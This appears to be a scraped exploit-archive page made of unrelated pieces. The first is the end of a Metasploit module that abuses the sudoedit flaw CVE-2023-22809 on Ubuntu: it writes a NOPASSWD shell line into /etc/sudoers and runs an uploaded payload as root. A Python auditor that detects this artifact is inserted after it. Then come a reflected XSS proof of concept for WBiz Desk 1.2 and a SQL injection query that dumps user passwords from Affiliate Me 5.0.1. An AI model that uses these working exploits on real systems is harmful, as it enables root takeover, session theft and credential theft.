Set ForceExploit to override'<br /> end<br /><br /> if get_editable_file.nil?<br /> fail_with Failure::BadConfig, 'Unable to automatically detect sudo editable file, EDITABLEFILE option is required'<br /> end<br /><br /> # Make sure we can write our exploit and payload to the local system<br /> unless writable?(base_dir) && directory?(base_dir)<br /> fail_with Failure::BadConfig, "#{base_dir} is not writable"<br /> end<br /><br /> sys_info = get_sysinfo<br /><br /> # Check the app is installed and the version<br /> fail_with(Failure::NoTarget, 'Only Ubuntu 22.04 and 22.10 are exploitable by this module') unless sys_info[:distro] == 'ubuntu'<br /> fail_with(Failure::NoTarget, 'Only Ubuntu 22.04 and 22.10 are exploitable by this module') unless sys_info[:version].include?('22.04') || sys_info[:version].include?('22.10')<br /><br /> # Upload payload executable<br /> payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"<br /> upload_and_chmodx payload_path, generate_payload_exe<br /> register_file_for_cleanup(payload_path)<br /><br /> @flag = Rex::Text.rand_text_alphanumeric(12)<br /> print_status 'Adding user to sudoers'<br /> # we tack on a flag so we can easily grep for this line and clean it up later<br /> command = "EDITOR=\"sed -i -e '$ a `whoami` ALL=(ALL:ALL) NOPASSWD: #{datastore['SHELL']} \# #{@flag}' -- /etc/sudoers\" sudo -S -e #{get_editable_file}"<br /> vprint_status("Executing command: #{command}")<br /><br /> output = cmd_exec command, nil, timeout<br /> if output.include? '/etc/sudoers unchanged'<br /> fail_with(Failure::NoTarget, 'Failed to edit sudoers, command was unsuccessful')<br /> end<br /><br /> if output.include? 
'sudo: ignoring editor'<br /> fail_with(Failure::NotVulnerable, 'sudo is patched')<br /> end<br /><br /> output.each_line { |line| vprint_status line.chomp }<br /> print_status('Spawning payload')<br /><br /> # -S may not be needed here, but if exploitation didn't go well, we dont want to bork our shell<br /> # also, attempting to thread off of sudo was problematic, solution was<br /> # https://askubuntu.com/questions/1110865/how-can-i-run-detached-command-with-sudo-over-ssh<br /> # other refs that didn't work: https://askubuntu.com/questions/634620/when-using-and-sudo-on-the-first-command-is-the-second-command-run-as-sudo-t<br /> output = cmd_exec "sudo -S -b sh -c 'nohup #{payload_path} > /dev/null 2>&1 &'", nil, timeout<br /> output.each_line { |line| vprint_status line.chomp }<br /> end<br /><br /> def on_new_session(session)<br /> if @flag<br /> session.shell_command_token("sed -i '/\# #{@flag}/d' /etc/sudoers")<br /> flag_found = session.shell_command_token("grep '#{@flag}' /etc/sudoers")<br /> if flag_found.include? @flag<br /> print_bad("Manual cleanup is required, please run: sed -i '/\# #{@flag}/d' /etc/sudoers")<br /> end<br /> end<br /> super<br /> end<br />end<br /></code></pre>
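Detection for the artifacts this module leaves behind, as an added example that is not part of the module or of sudo: a stdlib-only audit of a sudoers file that flags sudoedit grants (the precondition the module's check looks for with sudo -l) and NOPASSWD shell grants of the form the module appends, including its trailing comment marker. The sample sudoers text is constructed, and the env_delete hardening check assumes the Defaults line form given in the sudo advisory linked from the module's references.

```python
# Added example (not part of the Metasploit module or of sudo): audit a sudoers
# file for the precondition and the on-disk artifact tied to CVE-2023-22809.
import re

# Interpreters whose NOPASSWD grant is equivalent to an unrestricted root shell.
SHELLS = ("/bin/sh", "/bin/bash", "/bin/dash", "/bin/zsh", "/usr/bin/sh", "/usr/bin/bash")

# user host=(runas) [TAG:] command ...  (aliases and included files are not expanded)
USER_SPEC = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^\s=]+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*(?P<cmds>.+)$"
)
ALIAS_OR_DEFAULTS = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")


def split_comment(line: str):
    """Return (code, comment). '#include'/'#includedir' are directives, not comments."""
    s = line.strip()
    if s.startswith(("#include", "@include")):
        return "", ""
    idx = s.find("#")
    if idx == -1:
        return s, ""
    return s[:idx].strip(), s[idx + 1:].strip()


def audit_sudoers(text: str) -> list:
    """Return findings as (line_no, kind, line) tuples; line 0 is a file-level finding."""
    findings = []
    hardened = False
    saw_sudoedit = False
    for no, raw in enumerate(text.splitlines(), 1):
        code, comment = split_comment(raw)
        if not code:
            continue
        if code.startswith(ALIAS_OR_DEFAULTS):
            # Assumption: the workaround from the sudo advisory has the shape
            #   Defaults!SUDOEDIT env_delete+="SUDO_EDITOR VISUAL EDITOR"
            if code.startswith("Defaults") and "env_delete" in code and "EDITOR" in code:
                hardened = True
            continue
        m = USER_SPEC.match(code)
        if not m:
            continue
        cmds = m.group("cmds")
        if re.search(r"\bsudoedit\b|\bsudo\s+-e\b", cmds):
            saw_sudoedit = True
            findings.append((no, "sudoedit grant (CVE-2023-22809 precondition)", raw.rstrip()))
        if "NOPASSWD" in cmds and (re.search(r"\bALL\b", cmds) or any(s in cmds for s in SHELLS)):
            kind = "NOPASSWD shell grant"
            if comment:  # the module tags its injected line with "# <random flag>"
                kind += " with trailing comment marker"
            findings.append((no, kind, raw.rstrip()))
    if saw_sudoedit and not hardened:
        findings.append((0, "no Defaults env_delete for SUDO_EDITOR/VISUAL/EDITOR", ""))
    return findings


# Constructed sample, not taken from any real host.
SAMPLE_SUDOERS = """\
# constructed sample, not taken from any real host
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
# the kind of grant the module's check looks for with 'sudo -l'
lowpriv ALL=(root) sudoedit /etc/motd
# the line the module appends; the trailing token is its cleanup flag
lowpriv ALL=(ALL:ALL) NOPASSWD: /bin/sh # Ab3kQ9xZpLm2
@includedir /etc/sudoers.d
"""

if __name__ == "__main__":
    for line_no, kind, line in audit_sudoers(SAMPLE_SUDOERS):
        print(f"line {line_no}: {kind}: {line}")
```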
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://www.codester.com/items/5641/ │<br />│ Vendor : WeBiz Digital │<br />│ Software : WBiz Desk 1.2 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ An attacker who sends the victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL<br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /ticket.php<br /><br />GET parameter 'tk' is vulnerable to RXSS<br /><br />http://website/ticket.php?tk=d92h8"><script>alert(1)</script>ygwfb<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>[#] Exploit Title: Affiliate Me Version 5.0.1 - SQL Injection<br />[#] Exploit Date: May 16, 2023.<br />[#] CVSS 3.1: 6.4 (Medium)<br />[#] CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N<br />[#] Tactic: Initial Access (TA0001)<br />[#] Technique: Exploit Public-Facing Application (T1190)<br />[#] Application Name: Affiliate Me<br />[#] Application Version: 5.0.1<br />[#] Vendor: https://www.powerstonegh.com/<br /><br /><br />[#] Author: h4ck3r - Faisal Albuloushi<br />[#] Contact: SQL@hotmail.co.uk<br />[#] Blog: https://www.0wl.tech<br /><br /><br />[#] 3xploit:<br /><br />[path]/admin.php?show=reply&id=[Injected Query]<br /><br /><br />[#] 3xample:<br /><br />[path]/admin.php?show=reply&id=-999' Union Select 1,2,3,4,5,6,7,8,9,concat(ID,0x3a,USERNAME,0x3a,PASSWORD),11,12,13,14,15,16 from users-- -<br /><br /><br />[#] Notes:<br />- Affiliate admin can exploit this vulnerability to escalate his privileges to super admin.<br /></code></pre>